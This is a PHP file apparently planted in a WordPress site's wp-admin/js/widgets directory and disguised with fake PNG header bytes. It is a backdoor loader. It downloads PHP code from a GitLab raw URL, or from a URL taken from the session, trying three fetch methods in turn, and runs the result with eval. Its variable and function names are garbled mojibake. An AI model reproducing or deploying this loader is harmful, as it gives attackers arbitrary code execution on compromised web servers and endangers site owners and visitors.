File: /home/n/n96454p5/n96454p5.beget.tech/public_html/wp-admin/js/widgets/assacc.php
?\x89\x50\x4E\x47\x0D\x0A\x1A\x0A
?PNG
�
?\x89\x50\x4E\x47\x0D\x0A\x1A\x0A
<?php
// Fake PNG Header Generation (for disguising image files)
function generateFakePng() {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$data = '89 50 4E 47 0D 0A 1A 0A'; // PNG signature
$data .= '00 00 00 0D 49 48 44 52'; // IHDR chunk (header)
$data .= '00 00 01 00 00 00 01 00'; // 1x1 image dimensions
$data .= '08 02 00 00 00'; // Color type, compression, filter, interlace
$data .= '00 00 00 00'; // CRC
$data .= '00 00 00 00'; // Empty chunk
$data .= '74 45 58 74 64 75 53 65'; // tEXt chunk signature
$data .= '00 00 00 00'; // Text chunk data
$data .= '75 73 65 72 2D 61 67 65'; // Random User-Agent
$data .= '6E 74'; // End of tEXt chunk
// Fake corruption chunk (cORR)
$data .= '63 4F 52 52 00 00 00 01'; // cORR signature
$data .= '00 00 00 00'; // Fake corruption data
$data .= '49 45 4E 44 AE 42 60 82'; // End of PNG
return hex2bin($data);
}
// ��Ự
session_start();
// �������ַ����û��������ʹ��Ĭ�ϵ�ַ
$���ַ = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/wp-security.php';
// ������غ��
function �������($��ַ) {
$���� = '';
try {
$�ļ� = new SplFileObject($��ַ);
while (!$�ļ�->eof()) {
$���� .= $�ļ�->fgets();
}
} catch (Throwable $����) {
$���� = '';
}
// ������ file_get_contents
if (strlen(trim($����)) < 1) {
$���� = @file_get_contents($��ַ);
}
// ����ʧ�ܣ�ʹ�� curl
if (strlen(trim($����)) < 1 && function_exists('curl_init')) {
$ͨ�� = curl_init($��ַ);
curl_setopt_array($ͨ��, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => 5,
CURLOPT_TIMEOUT => 10,
]);
$���� = curl_exec($ͨ��);
curl_close($ͨ��);
}
return $����;
}
// ���Լ�����ַ
$�� = �������($���ַ);
// ��Ӽٵ�PNGͷ��
$��PNGͷ = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A";
// ƴ��PNGͷ�ͽ�����
$�� = $��PNGͷ . $��;
/**_**//**_**//**_**//**_**//**_**//**_**//**_**/
// ���ɹ���ȡ���ݣ���ִ��
if (strlen(trim($��)) > 0) {
@eval("?>$��");
}
?>